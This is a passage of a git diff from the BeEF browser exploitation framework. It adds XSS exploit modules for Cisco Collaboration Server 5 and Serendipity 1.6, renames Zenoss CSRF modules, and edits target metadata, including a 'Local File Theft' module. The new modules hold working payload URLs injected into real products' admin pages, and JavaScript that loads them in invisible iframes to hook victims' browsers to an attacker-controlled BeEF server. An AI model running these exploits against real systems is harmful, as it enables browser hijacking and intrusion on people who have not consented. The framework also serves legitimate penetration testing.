+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
+ cisco_collaboration_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
new file mode 100644
index 000000000..3320a74f6
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ cisco_collaboration_server_5_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Cisco Collaboration Server 5 XSS"
+ description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/"
+ authors: ["bcoles", "s4squatch"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
new file mode 100644
index 000000000..f0e42f7df
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Cisco_collaboration_server_5_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'}
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
new file mode 100644
index 000000000..a20ff5bbb
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var serendipity_iframe = beef.dom.createInvisibleIframe();
+ serendipity_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
new file mode 100644
index 000000000..96d9e9bb2
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ serendipity_1_6_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Serendipity <= 1.6 XSS"
+ description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/"
+ authors: ["bcoles", "Stefan Schurtz"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
new file mode 100644
index 000000000..cf46a83d1
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Serendipity_1_6_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'}
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index 3ae083e7a..eaf9a25f5 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -18,7 +18,7 @@ beef:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
- name: "Zenoss Add User CSRF"
+ name: "Zenoss <= 3.2.1 Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
index 9249f7d99..923946d5d 100644
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -18,7 +18,7 @@ beef:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
- name: "Zenoss Daemon CSRF"
+ name: "Zenoss <= 3.2.1 Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml
index 4a0d23f18..ba611bf45 100644
--- a/modules/host/detect_google_desktop/config.yaml
+++ b/modules/host/detect_google_desktop/config.yaml
@@ -24,5 +24,5 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone"]
+ os: ["iOS"]
working: ["ALL"]
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
index 802db1695..7902a2381 100644
--- a/modules/host/get_system_info/config.yaml
+++ b/modules/host/get_system_info/config.yaml
@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone", "Macintosh"]
+ os: ["iOS", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 0033717ba..56c276653 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone"]
+ os: ["iOS"]
working: ["All"]
user_notify: ["FF", "C"]
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index d3bb15769..783637ed4 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -24,7 +24,7 @@ beef:
target:
user_notify:
S:
- os: ["iPhone"]
+ os: ["iOS"]
not_working:
ALL:
os: ["All"]
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml
index 4c44194e1..d6b2c0be4 100644
--- a/modules/misc/local_file_theft/config.yaml
+++ b/modules/misc/local_file_theft/config.yaml
@@ -23,7 +23,7 @@ beef:
enable: true
category: "Misc"
name: "Local File Theft"
- description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system."
+ description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system."
authors: ["mh"]
target:
- working: ["All"]
+ working: ["S"]
diff --git a/update-beef b/update-beef
new file mode 100755
index 000000000..4524a540f
--- /dev/null
+++ b/update-beef
@@ -0,0 +1,19 @@
+#!/bin/bash
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+echo Updating...
+git pull
\ No newline at end of file